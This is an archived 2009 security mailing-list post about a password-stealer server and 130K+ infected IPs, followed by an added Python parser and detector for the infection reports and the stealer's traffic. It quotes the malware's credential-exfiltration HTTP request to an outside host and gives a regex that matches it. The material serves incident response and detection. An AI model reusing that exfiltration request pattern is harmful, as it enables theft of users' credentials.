[nsp-sec] 130K+ Infected IPs on ~3600 ASNs
Stephen Gill
gillsr at cymru.com
Thu Oct 1 13:47:33 EDT 2009
Hi Team,
This password stealer head end IP appears to be quite busy:
76.73.37.250
We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected IPs seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
takedown to last forever because they can likely re-route via DNS.
ASN list:
https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
Infected IP list:
https://www.cymru.com/nsp-sec/Owned/stealer/
eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
Timestamps in UTC.
Some clarification on the formatting:
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.
It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases. I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious. Here is a
public URL for reference:
http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
As there is UDP involved we cannot guarantee that there are 0 spoofed IPs,
but on the TCP side that is another matter.
HTTP credential stealing looks something like this:
GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: hotshows.org
Cheers,
-- steve
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
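The following Python is an added example and is not part of Steve's post or any Team Cymru tooling. It shows what a receiving ISP might do with the per-AS files described above: parse the "ASN | IP | U/T timestamp | AS name" lines, rank each sighting by how much it can be trusted (TCP sightings are hard to spoof, UDP sightings may be spoofed, RFC 1918 sources cannot be acted on at all), and, separately, recognise the credential-reporting GET request quoted in the post so it can be matched in proxy or IDS logs. The sample report lines beyond the MIT one and the sample HTTP requests are constructed; the regular expressions, field names and confidence labels are my own assumptions about a reasonable parser, not a documented format specification.

```python
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the line format the post describes. The first line is the
# post's own example; the other two are made up (one TCP sighting, one RFC 1918 source).
SAMPLE_REPORT = """\
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
3 | 18.26.4.10 | T 2009/10/01 04:01:12.000001 | MIT-GATEWAYS - Massachusetts Institute of Technology
3 | 10.1.2.3 | U 2009/10/01 04:05:00.123456 | MIT-GATEWAYS - Massachusetts Institute of Technology
"""

# Assumed layout: ASN | IP | <U|T> <UTC timestamp> | AS name
LINE_RE = re.compile(
    r"^\s*(?P<asn>\d+)\s*\|\s*(?P<ip>[\d.]+)\s*\|\s*(?P<proto>[UT])\s+"
    r"(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s*\|\s*(?P<asname>.*?)\s*$"
)


@dataclass
class Sighting:
    asn: int
    ip: str
    proto: str        # "T" = seen on TCP 80 (credential reports), "U" = UDP 7006-7012 only
    seen: datetime    # timestamps in the files are UTC
    as_name: str

    @property
    def confidence(self) -> str:
        """TCP sightings required a completed handshake, so the source is real.
        UDP sightings may be spoofed. RFC 1918 sources are unusable upstream."""
        if ipaddress.ip_address(self.ip).is_private:
            return "unusable"
        return "high" if self.proto == "T" else "low"


def parse_report(text: str) -> list:
    """Parse one per-AS file into Sighting records; raise on an unexpected line."""
    sightings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised line: {line!r}")
        ts = datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)
        sightings.append(Sighting(int(m["asn"]), m["ip"], m["proto"], ts, m["asname"]))
    return sightings


def actionable(sightings: list, min_confidence: str = "low") -> list:
    """Keep only sightings at or above the requested confidence level."""
    rank = {"unusable": 0, "low": 1, "high": 2}
    return [s for s in sightings if rank[s.confidence] >= rank[min_confidence]]


# Shape of the credential-reporting request quoted in the post: GET /pp2/ with
# s= (site), u= (username) and p= (password) query parameters.
STEALER_RE = re.compile(r"^GET\s+(?P<target>/pp2/\?\S+)\s+HTTP/1\.[01]", re.I)


def classify_request(raw: str):
    """Return {site, user, has_password} for a matching stealer report, else None.
    The password value itself is never returned, only whether one was present,
    so the output is safe to hand to a victim-notification workflow."""
    first = raw.splitlines()[0] if raw else ""
    m = STEALER_RE.match(first)
    if not m:
        return None
    qs = parse_qs(urlsplit(m["target"]).query)
    if not {"s", "u", "p"} <= qs.keys():
        return None
    return {"site": qs["s"][0], "user": qs["u"][0], "has_password": bool(qs["p"][0])}


# Constructed request mirroring the post's example (placeholders, not real data).
SAMPLE_REQUEST = (
    "GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php"
    "&u=STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible)\r\n"
    "Host: hotshows.org\r\n\r\n"
)

if __name__ == "__main__":
    for s in actionable(parse_report(SAMPLE_REPORT), "high"):
        print(f"AS{s.asn} {s.ip} {s.seen.isoformat()} {s.confidence}")
    print(classify_request(SAMPLE_REQUEST))
```

An operator would run `parse_report` over their own `asNNNN.txt` file and start notifications from the "high" set, treating the UDP-only set as leads to be confirmed against their own flow data for UDP 7006-7012 rather than as proof on their own.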